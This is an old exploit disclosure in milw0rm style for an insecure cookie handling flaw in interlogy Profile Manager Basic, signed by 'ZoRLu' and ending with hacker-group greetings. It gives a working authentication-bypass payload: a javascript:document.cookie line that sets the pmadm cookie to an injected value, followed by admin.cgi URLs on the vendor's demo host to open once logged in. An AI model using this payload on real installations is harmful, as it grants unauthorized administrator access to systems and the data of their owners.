[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling Vulnerability [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 06/06/2009 [~] [~] Home: yildirimordulari.com / z0rlu.blogspot.com [~] [~] msn: trt-turk@hotmail.com [~] [~] N0T: Kpss AnanI .... [~] ----------------------------------------------------------- desc: normal login for cookie pmadm=dGVzdA; if ý do this: pmadm=dGVzd(write any thing); example: pmadm=dGVzdz; or pmadm=dGVzd123231212313; not login if ý do wthis: pmadm=dGVzd ' or '; boom this loggin :D exp: javascript:document.cookie = "pmadm=dGVzd ' or '; path=/"; after you go here: http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX and all friends [~] [~] yildirimordulari.com / z0rlu.blogspot.com [~] [~]---------------------------------------------------------------------- # milw0rm.com [2009-06-08]